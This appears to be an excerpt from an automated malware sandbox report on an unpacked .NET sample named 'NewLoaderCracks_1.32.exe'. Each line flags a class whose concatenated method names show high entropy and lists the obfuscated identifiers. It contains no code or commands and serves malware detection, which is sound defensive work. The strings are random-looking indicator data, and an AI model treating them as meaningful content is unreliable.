            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, aUhb82JNGmSK692gsl.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'Cx5ROSWHMYC5VC6oCnP', 'Urrjs7WsPAjJyc60TOZ', 'Mhw0axWq0ZDKGFoGHs5', 't5JtcCWDv1rLQkormq9', 'BSOvW9WVP4ayInFXWuG', 'VLiPeXWIfgnJnw8Tvgq'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, RNPKDLRgnTWovsb2PfJ.csHigh entropy of concatenated method names: '_269', '_5E7', 'PQXAY7VWLI', 'Mz8', 'yohA7TleOU', 'OP1F14KMF4kj7I4bm5Q', 'KTt6cgKO3RuPk7vQ8aU', 'kEl3iAKR9ON6jrrD1KN', 'ha1GFeK3RyCXTPAArw5', 'muffLoKXqwKU5kwGwGF'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, zPI4UC7j83EwXD93Buo.csHigh entropy of concatenated method names: 'l25liIsSVRAXkTxhLoT', 'kRCHdrsCZmYs8K5oHpY', 'cTTwX2s1iN28bgeyNcP', 'LGr1r5svF1wdi82OCj1', 'Fcl8iXx74V', 'sOHDvOsuClk44daZQ4g', 'ITwhOPs6YmOKYDicVB8', 'uG4K4qsb0xa1LiMrm47', 'aKhPols46I51NIIFjjh', 'DkSo2msnJdwGX0u8XoL'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, zBhiTPvKhTWbp26i2p0.csHigh entropy of concatenated method names: 'pY8yHFUs5G', 'aUCCrsvdwjoMe4LBmZZ', 'SjOoHVvGoD9gA7bhYmr', 'rhXaAxv7HkjLAKVVa4a', 'bejCuev0EgmIHetNxmF', 'BARX5oQXfK', 's9xX8C9TXM', 'v7vX1ol8mo', 'OYiXu0FVCX', 'R4XXxYYjao'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, LqC3sHlqHwtkwo6WEcx.csHigh entropy of concatenated method names: 'mnqvWGuQpD', 'I3gvYhqYsf', 'MGRvznbE1i', 'ITiK6o6LT3', 'dyWK9K3kSS', 'ybHKltf92S', 'IbtKRNuRTP', 'GNbKvWoAlK', 'u9PKKHe0t0', 'x9mZ5fZ3x5ZJG68aGVV'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, x53ABG9f1owHDDKBaS3.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'qV714oYxEu5IA2a3IyF', 'tdCyEVYrg90xmuk4ey3', 'bwC1yfYg8T5ahHZGFaF', 'LrLyhWYNYKnYVp4WCZv', 'kCOJKvYUdWmWYgv5nkd', 'qNKUBqYWEbuDaorAp4Y'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, vVOmPGvrq31DO4wGvpR.csHigh entropy of concatenated method names: 'R5nyDoZ5tK', 'DwTyBrHcuW', 'kk9yEV8q9Z', 'b9gyIJCf9Z', 'EeuyctOC8U', 'jRTHRsvfDsnDW4YldbC', 'LXbZTHvzS3aRgR9ypIf', 'tQHYTlvtoJJ6V43XY8w', 'nhcgyQvk9bof5Qmiq6d', 'ixvoDiSxBCp6UFJKX25'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, bIFPV1lcgwYDSDD5lM3.csHigh entropy of concatenated method names: 'bUo3Z5cfiR', 'gCx3wimkVY', 'qfuKiS03euwGOCRsh0W', 'BMIA9Q0Xq5UEHcenUUI', 'dtHJU20OQiAFIO5ANvA', 'E5ecsj0RPxCCbXlN4Se', 'oVv3Hi9Lyx', 'vrioWWdxPAAeEAOZh5e', 'OkLqyudr2pemMUuLDdk', 'SmEmKA0fUF0UgZYyBEc'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, JeBQwbdky5DS6jtXTP.csHigh entropy of concatenated method names: 'WHsxJy1sc', 'u2WDYPxEk', 'aHmBs3h3r', 'ege99wran3LKLhyMRgP', 'i9kMHprPcg7MLdfjQrS', 'uFaJDVrLJbcmY4mMoMt', 'c2rpZnrBoiUKMnDlhee', 'gIBPDWro1FcnGOkEtvy', 'yebZsKr9hnYS0xnOuhX', 'mhmQE5riEYTBa61AsV3'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, qdhFZ8R4DvSTxeWyhpd.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'i55A28VT4E', '_168', 'wh4ZssKvk0oUHRnpIPh', 'pWB19ZKSXxIDgPLmwpM', 'Fqn38NKCyuOckWts74a', 'zoMDN2K2u7HS2s9nuZw', 'brUvuJKEEsPq7wABrSx'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, hDc22q36rjYl7cot4V2.csHigh entropy of concatenated method names: 'Gh5kLPB2Ov', 'kFnkVYtcxi', 'Gdrkno7VIK', 'TH8k4bfWZ6', 'lXtk2XA0DL', 'es4ktcEykF', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, gWl6xsRsO4F1ET3XU7j.csHigh entropy of concatenated method names: '_5u9', 'hLLAwVhSAi', 'KM6X61hMyw', 'WrwAtwsyJM', 'mCKeOY5tXQeMwS6MiHG', 'v9FKKJ5kQ9RTBpF7hye', 'GCBKyX5f1waRepCJ85T', 'TrVFHr53drf9y9BDftT', 'Ba8k165XPXWXtEIPSsh', 'KB1lyd5zhIZrA5XYv5A'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Kt2Y7f9q06pPifGXJIv.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'OF6sUBePE6BtaE3Kuth', 'jo2OSGeLZQCihT7DSeP', 'bTYDhYeayv0ue773mIo', 'tISHVAeBJK3JyVTc0WR', 'XUbls3eoaS4tr8O1Zld', 'fKvWaue9899EEIL168C'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, OoKQBd9PQOIINrUiJIJ.csHigh entropy of concatenated method names: 'nvH9SECnn5', 'EJtkr9Y02dd1A38WfQl', 'XlHpHOYdWQf7eQiK3TE', 'WVUDHHYZBVdAyebjYG9', 'lG30BEY7V9IcpZdKkVL', 'jf43DHYG4UQNuA9wAeg', 'wDNYDYYJJOjAGWOYYHM', 'OoP7uAY89U3psKsYPh1', 'C0ckiUYwef8IS4J0kWI', 'f28'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, tUR51qRtos8neeSCfCF.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'KRAX0V5agb', 'pBIAOwpU4N', 'BVnXyNYHGn', 'QSmAdTpoPh', 'tIS4B5KaehkqaEXNWVO', 'Ek9kscKBa9VD0kLhBRt', 'KTxkDuKPNsRwAANJxf6'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, s6gHsPvOqP2JDMQnOmc.csHigh entropy of concatenated method names: 'J5yjuhKgDq', 'iILjxvlJMS', 'iv5jDGxkJ1', 'aPtjBEwN4V', 'YP0jEhUOYu', 'R0kfhECGxgpsocX10dM', 'NkwZHtC0HtaO4Q1lUQq', 'EQQQPRCd2INaDLUgP93', 'WbfQd2CJ2MQlmW0EuGx', 'RP9RK3C8hWX6nOLiBP8'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, VsKPJfRrqU3kOWT58HW.csHigh entropy of concatenated method names: '_223', 'DyYk3t8078Xls8GcoPP', 'FfYd4F8d8HoBmL5CqR5', 'Kskasr8GaKO41fREd9M', 'HuoGNd8Jm5tuSa6awmA', 'oUExc688tSyeHKK1Utc', 'YoDYYH8wL1wwGyrAPgO', 'INVPkY855VEwi5Hk9wo', 'c79KOZ8KeBDh3NkbVJQ', 'IT8FCp81k70nebsS7fw'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, qaeqiIKANYedU44nENd.csHigh entropy of concatenated method names: 'vT1kvNUqqj', 'OmTkKTboCX', 'YXEk3hbTqu', 'MPDk7suR6d', 'a3qkZk6930', 'ztpkwYWJKy', 'rhnkXmkoqO', 'QG2k0fm6gG', 'ScrkyvZfkt', 'CBhkrbdtO3'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, q91kAv9rFvHpicluOel.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'HaH8HHyCXGop8YKgc1a', 'APchiSy2kqWw91PSEOi', 'GZ05PByE3sk4o0EOdv8', 'NhawT9yuGjHFVrCrgEk', 'Ir1woFy69AlQfLYVGYL', 'lRfe8mybEU5OwPbnAHD'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, wyJFCl9x9fYR1NwiG31.csHigh entropy of concatenated method names: 'F7E9gcvwr6', 'MUfj3Ul1pG5vZJ2Ev1w', 'GnXQUwlvbLFmx0ghYdg', 'l6S47Vl5JIEZ3oVoNB8', 'Cplf9RlKcedFKl2UfKh', 'fk8aCIlShZqeJ5obuJr', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, aTrJGWKb56QoYmFQAQO.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'HVakhyUyrY', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, PL0IiPRfXfjK4KIr5xd.csHigh entropy of concatenated method names: 'hfOZQykpe7', 'X0kZgyn0Ye', 'iGXZAe2Oy0', 'wFBZJ8TVOm', 'sGqZb31DO4', 'b3r8bpwpvlVFM1YtCxV', 'DZdmsgwyN68LpPpt5vZ', 'KEa5NUwUNkJeX94d9c3', 'AfN6ljwWAOI47SHnqPd', 'ohtw2dwYARJiUSnoAPL'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, lagxIU9pd3fOSXyoW5x.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'WZDHd9Y1dC2erxni2rA', 'hxgcadYvd3d5hqN9UXf', 'Q4QydsYSxFHP3O3Wte5', 'c6dh0SYCXf6Hj4mBnUD', 'g2SP66Y2dZMnKI0HJ5d', 'dR8NnQYEDpgQdD9cSd0'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, eKIJSugVWHhu7Ecvwr.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'kdmkiPW2ydU7yLhH4bJ', 't8cnxjWEqHYHYgAbFFs', 'SuDoaaWu6dHFxi8iIh5', 'j04Vc4W6fIkK16YI1Jm', 'jsGejMWb7P6bSG2oGb6', 'tEM3HUW4VHpP5GfiQfF'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, BMDE7K9JJ0GausKexUM.csHigh entropy of concatenated method names: 'm3ElPMHjU1', 'n1sALDjpaBN183WFupS', 'msuOljjyc15pgkWhgdV', 'hn9NDOjUGxeQLaLWemX', 'gobQsUjWpG8wIqBRDPi', 'EqH8mNjYhm0J7Yt6iI5', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, L3rkJ9v0wfOykpe7b0k.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, onxbvKvFYRiYgj2LUgx.csHigh entropy of concatenated method names: '_7zt', 'UktrPhONEb', 'MrdrUBwe0g', 'bNNrmQgrLZ', 'rfNrpqF7q3', 'GoOrTfCYtW', 'NU2rhqvBE0', 'MtlJMDS5MlaZqhjEEhq', 'N5FKvoSKTM3xHTIlXhk', 'lihOZBS8JBwj3DG9768'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, PhlmOO33kFK31SVC9ER.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, LRnbE1lUiETio6LT3vy.csHigh entropy of concatenated method names: 'r1GvjPTNAP', 'hnJviL8UrN', 'm4iRFbc15rKk2HUhw5i', 'hnjdTbcv7fuxLpQMFBO', 'wamRGlc5ZOO0IGlEamL', 'kfk3IOcKQ6W9MRJxu3R', 'GSroIYcSvPKtg8OUFeU', 'jGeINRcCD4RcfnTSr5V', 'eBeJJbc2jvE8PTQU09v', 'MyKTBTcEZ90VNFlfU40'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, e2xI1uli2BvyPgOWt3H.csHigh entropy of concatenated method names: 'cDIRJmiyo6', 'MG4UoJhNwPrQjI5lB57', 'U2Vo2shU57Ndo89Jev3', 'frcPyphrOu2UfXMBuXm', 'dT58OPhgNISD3n7GAjH', 'xuoR9XhWo6u6GQDCoUm', 'H4vWC1hpXC3YTFD5tuo', 'WH7iLmhy778ggBsjR1A', 'FqTw9KhYemN6TlbZSkk', 'HLasCjhe7UmZ9itjD9U'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, TNvZay3pOuluj5OwSvS.csHigh entropy of concatenated method names: 'J8NdUIO02T', 'QcidmRVOZn', 'TCOdpQ8OEV', 'wu9dTiTVve', 'BN7dhM0eZO', 'wTaBTbot6PnWCXSyrrD', 'tQN52wok6TMm4r0Z5nq', 'ymlroHofNXOrObjWJqI', 'JHshW3ozoYlE5aZ0FUo', 'FmaqX39x4QmS2KWLYIh'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, xuDPF3KRHi7u5qFcYsd.csHigh entropy of concatenated method names: 'gOnlHA45JGQn4hPG3PU', 'lTDSat4KTMTCK0ha96P', 'sPU3l048oIvTtYbZNRv', 'esFxZO4wGtMvtUCteGB', 'I5oUN2uKC1', 'qsn9xQ4SAZCIj64X34R', 'PxoJPX4CeqbsOx2PAxd', 'xcLbJ341Aom3Ll00t5N', 'jYjPFa4vYwJ8I9fp2wm', 'EC9c1m42l3QZHL0UCtl'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, DLIptRcP5hqxvlRK7M.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'hEYIPXNXkXHK9CCajp1', 'Iluc2ANte7GTmMvoaS3', 'iUJmk6Nk5pHZiJLxWcF', 'ftCh5jNfmD04tmTZaeh', 'n5g0q5Nz7eb7pds2mTj', 'ca0AxWUxlNYxXD9JXmj'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, phqcKeK1mcShOwIBfct.csHigh entropy of concatenated method names: 'nPdNQPeJDG', 'gUFNgbmaM7', 'oZqNAYtgN2', 'ywTNJHviQY', 'XXUNblJrN5', 'TKdNWheNh0', 'S70KeMLDLo1IHDhkKgI', 'huLhQDLsbXXVWhJ4CjR', 's7yMwnLqE57KuAPVsm4', 'KJUnoELVq59x1PWsslM'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, XYTvEgEdOn3VF2FFNt.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'kalFvjNPmM8SteyC0Q9', 'rvao1wNLof2njj7JelL', 'mVmDZlNaGWoPwvEiXQE', 'asaKdlNBWi4AjQ6uKr8', 'iSnoU8NoN3ZLogTK3Wj', 'W4Hr35N9QS18Oiy5eVo'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, USfWgM9YPEPl6et9gXe.csHigh entropy of concatenated method names: 'AWGlTgtLEM', 'NfllhXZUOj', 'KVJlNJ1knj', 'gayaNPjAZ8lrH9wkeeH', 'Odud3ujeWQXsklyTimV', 'bxTdfgjlOgR8fBE3ZNo', 'LtMVQTjja0vtixpRajV', 'tSiQuljmXFiFuN71BKn', 'KZdd0NjF50xPW0CoVs5', 'rAk39wjhWhK4qBykGYh'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Q6dtO9KQg7t1MhAiPxK.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, jinINCvwU1Z6HGWbpLQ.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, EjwkB2z5TSBmyCSo1h.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'q5iZGMpNVPubTJmdLn3', 'zJcIOTpU1iONtROt9oe', 'Ql6soUpWpkJJjYuYN7l', 'zdah2WppshZuw3Obsp5', 'Wb9iWtpyttnjJxVjFMM', 'iscfADpYGHYMQYZXcof'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, gPM5LvW7t53NGescAL.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'MY91KRWRHimB6F9SG6k', 'Jyq2QqW3JQpENsFN6wi', 'KHPDrGWXOwSyJu594YP', 'N5T8AdWtM2q9iBBxjES', 'aGis7LWkSi7agLi6BCy', 'C5uVPVWfgQkBaxTf8qX'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, OVytoBRJkkB8mvXG3th.csHigh entropy of concatenated method names: 'TlPHTQ1Lr1GVEauAnGd', 'aHX1jg1am4BwchPEu7b', 'YovKSi1QEsJeLj8Ljxr', 'N9dTp71Pet8d84ifGPn', 'IWF', 'j72', 'q2JXHOEhHZ', 'WYlXfOxxmY', 'j4z', 'gFcXFagpHr'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, sTNAPZl6nJL8UrN5G3c.csHigh entropy of concatenated method names: 'fm0lkCaThQ', 'XbEldbTxdU', 'c4hlOBadqX', 'kM7nkHj4DN1WeYc4yfO', 'QpOGsWjn5owk6jbJGWi', 'YsnsEQjQAYZbdR0mmM6', 'BQEiSYjPag90a8PUBlL', 'w1mDG6jLFi9XTIrELes', 'fcReEUjaPC1L6LKOkOA', 'hJ928ej6wXw3jv05kvR'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, eAIEiWRGuT0DLdJmEdh.csHigh entropy of concatenated method names: 'sg9', 'EkIAVk66FT', 'Nu3wWtnBd9', 'WKhABR6MFT', 'AkIqS15Dw8YD35ppHPm', 'kOBkey5Vt2bXkyT6nK7', 'sVcO5M5IQAhDYS8Dibf', 'cjPp1H5sG6ylnlvPrfP', 'KMJv0k5qV4cmAGElitI', 'ahdtKU5MJIGOusEr0ZR'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, rq0uC4T7MAii88bDUZ.csHigh entropy of concatenated method names: 'RG0N0ZYOs', 'eK6kWD0Ph', 'uo4d8pegH', 'KOoORVZT4', 'NBYa1HoDK', 'ryjqNo45j', 'qL8SjbWuD', 'H7KAv3rYYMbV6L9iyQH', 'iYeqm4reuAdY7LpBo9X', 'f7kFXxrl472QpMLGNrU'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, BHA5ckKxN1RpEYO0A8A.csHigh entropy of concatenated method names: 'wjrk6CPXEY', 'PVkuHcLtlAPVveO1LMe', 'tuM6WRL3GG7vIT1o0Dg', 'u4tpUrLXTQDx7wUqCWV', 'Dp68nULklx7Lf7Po4cN', 'Xvc7EiLfeKGfPywgvM4', 'TRhsE3LzaOXyPmelpdZ'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, mrhM939KRaqZJpAEAQQ.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'AYu44dpsNdAyGhObePU', 'UgWrWUpqvhv6l9ayvbv', 'yP7ImipDbPWLjJT19xb', 'bCGo3RpV0BfNA9jo4y0', 'krc2krpIX0YiB1eoL6u', 'bA8sSspM9Rp5w0omMW3'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, LaD94W3lE6s9EXDgZOf.csHigh entropy of concatenated method names: 'a7ydZGrQIx', 'khOdw6HShW', '_8r1', 'UDpdXw4kTa', 'I07d0ldRwA', 'UZWdyfJgpO', 'xsrdr86OEn', 'WnwrdGoZyPxrLQBJlt8', 'opKCORo7PlCfXwAIUhv', 'RHMpeLo0EV7rW0ZL2re'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Qhvj1tRVCck9P2urqru.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'EgOASKP5h3', 'vtcXvLkGQP', 'xCZAIl0I8E', 'DJGvfgKFHwvyQTc8CEx', 'X8yp41Khjq5oul55aXs', 'dWD2pOKcpYHREry4Z0N', 'Msu0s4KZWQ0XopUxgae', 'MUIk9DK7kMp15rtTNCY'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, X1ksjx9knfQstQDiYaY.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'AOQGf9YqA1UIT7lv1Xt', 'hj6w9AYDr1U192NRB1N', 'HuFlk0YVji1x7cmj54w', 'yYa4GgYIhTVF35rQ6RF', 'xCTNSwYMusFg2cb8627', 'Nc0lcqYObTko5cJGct6'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, x9V8q9KYZ99gJCf9Z1e.csHigh entropy of concatenated method names: 'Px9kaBludq', 'U81kqfOCt7', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'DjVkSnXNMf', '_5f9', 'A6Y'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, AeHf0H3200N8F0h8wpX.csHigh entropy of concatenated method names: 'y5lSTMUUv5', '_1kO', '_9v4', '_294', 'Gb3ShMLE4g', 'euj', 'XeRSNmdR9p', 'uToSkeHpkY', 'o87', 'reYSdBXeEv'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, x2GEZo70QclrbHZJC0W.csHigh entropy of concatenated method names: 'EY3YE2uu2c9iW', 'Po7KbWscbaHFsF6WQCs', 'fdCM4BsZPi9NNyIDfAp', 'iHMsMSs73oSHe03k5Bt', 'mdEEvts0sPu0fQkUUQv', 'r5ftS7sdocAtDbJF6Rt', 'EhXd9GsFKeNhLCBulmd', 'qd9BhGshX932ec2aFUL', 'oQfl4AsGaIeUVhR9njN', 'tamlDisJeCAEsF9ERBH'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, hAOp8OR9owXPgPYp5DS.csHigh entropy of concatenated method names: 'lUE7SjZE8X', 'qTj75jd32Y', 'i5F78ixgXF', 'xt771YwYTs', 'UYLco7dzUUt10rOtJWt', 'uvSlWldkWXSW6ddtJVH', 'C86E2mdfjh0BUNm7lHC', 'HSEAShGxWqsinJE1HAs', 'jSl4sKGr6yVX4hAKJ7V', 'Wk1IIGGgKdjL5e4wHdV'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, N36yYH3OXgUyXNSpeM6.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, O2gvDU95NOMAlPJ66JS.csHigh entropy of concatenated method names: 'vKg9LxagiM', 'zUMPhflgnjnBjSHYVaG', 'WnScjSlNcyVCjJSSxni', 'PfUKWJlx8WM0Lr1glE0', 'X5V6hrlriNlDDw3d4vj', 'p54QFxlUEhacfWlvNHs', 'bB1NX2lWY8iWnrcxoEt', 'wVAtyRlpD2AAmr42H7C', 'hkA9n7vOoh', 'YVMt2aleGiwN7YA3vRe'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, RHrgSUlFJHPGi4SFpy2.csHigh entropy of concatenated method names: 'M7yRzIqi4n', 'wU2v6E0Zrv', 'peMv9GgbRF', 'ILsvl7Rb6f', 'nOrvRdAgSM', 'HE7vvKJ0Ga', 'FsKvKexUMJ', 'eQxv3jPKUX', 'ituv7DIGxW', 'p7OvZrfWlC'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, u1OIBIRiW3RmDFyC1is.csHigh entropy of concatenated method names: 'YyrZMZ6Vis', 'vsTZs4QOqX', 'Ss2ZLg45rh', 'jinZVINCU1', 'N9KmDv8nsUvdVr27GcP', 'DbFkgD8QUhye42LAKoZ', 'SZ7Lcp8P0Id4ItLNfK3', 'TLIunf8bwoI8dn9Dhaq', 'k4S4EA84YvOoMri0tjP', 'ARFvRa8L6eELV8sva7x'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, nX3rRbvWryrmtEXt0Be.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, c4hBad90qXnMVQO8Ubp.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'YSwxdTyG4talWObDOMc', 'OZ0AbSyJOthlJDMHL8h', 'lgBl24y85f9IRRhj7UJ', 'oREoaMywsQ16MClkGYU', 'HjTY8gy5CaI01lUudDl', 'Ru5LoeyKBNQ17VjRoYw'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, h3LYx29iJMw2kCMi1e4.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'JU9wG2yBSVJ1uCm3oGp', 'XL0qkGyoMDMUucEcHj7', 'fq2CCSy9AFLYhrGPhuC', 'rUgRWryibVLDKtGloyN', 'KWRStsyTpgH0DyLd1lI', 'JfackfyHb68M9fLq7TJ'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, SRe90Hv2cbPqfyBf2JO.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'gJCie0Wewf', 'k89ioxf6vw', 'r8j', 'LS1', '_55S'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, tIHideRpbh7sVl4tMfy.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'zSNvRD5Fk2mNERMqahM', 'mCpyvT5hu8wXbF2I8f7', 'x4l0155cfYyw2TUNWFN', 'A0vint5ZXerNOvmvTuC'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, H9kGRDulG42C0P2ENw.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'rGSM1Y9mD', 'lVP5VhgQUgrn0WFqRbs', 'TSkwCFgPVKbh3jrhmJP', 'tn7IKKgLd3qHLjiBgJP', 'SwGposga2DRfwjDGmb2', 'Y73KRXgBf7tq9IUwnBk'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Dy5bm1lHtULYyswFZHT.csHigh entropy of concatenated method names: 'pMTRWUrh5F', 'NcvRYFLZ3n', 'XITaTyhGaykpKsI2YmS', 'sHW7WShJJJdH65DQYS8', 'aJx2NOh8WjSaD9GcXZk', 'mJN0MqhwyS7QvtxsLnc', 'nvZchmh5JPBBart817K', 'mRvSN8hKgP1jhYGlTgN', 'PwiLgIh1vCw5Yto0mrm', 'EBoOp2hvmg36y5dhITU'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, ebQm693BTWgIeWA8YnZ.csHigh entropy of concatenated method names: 'ADqqEBvAq1', 'L4XnogTuweZIemqPxJb', 'iC71wIT6KG0h9ZuGm4I', 'N6VceLT2a5AFO46IllV', 'WH1CYvTE93dICgqcIi6', '_1fi', 'TFDatqh3p2', '_676', 'IG9', 'mdP'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, sJuhRilllHaHsYLl3yG.csHigh entropy of concatenated method names: 'NjulnYeklG', 'ChLl4oKQBd', 'TOIl2INrUi', 'WIJltp3QJd', 'CL0lQdRiSf', 'xT1lgakJAu', 'mjT7Hlm0083o6xnXqZi', 'khE9G1md4Z82kS47Doy', 'yyrxALmZYQbFgB9q2bj', 'qInGbHm7rj50b3gDb7T'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Kk2UoY9R3o2OILLuSZa.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'qcv7RwpuIYEaQWfahxf', 'rmXJNDp6g61cqgoHZce', 'Q0c5kXpbWL6EchsLyl2', 'EOcyiNp4suKotc7m1mH', 'PDqymgpn1SkmF8r2f0A', 'rZ5oXqpQ96slwwMmfeK'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, m5kvJIRvqQ6vk88BQ7d.csHigh entropy of concatenated method names: 'erA7GowVsi', 'ctD7M19yAS', 'u3P7sJvRTj', 'fZU7LEpvoE', 'ooL7V02ywn', 'd2n7nfIWX0', 'iHgi1EGEp2NooHvRoxX', 'QuAGnqGCQ4FEtAtfPTP', 'N6pgo4G2kBaABTBj0vZ', 'oDODUKGuZKpEqqrHynX'
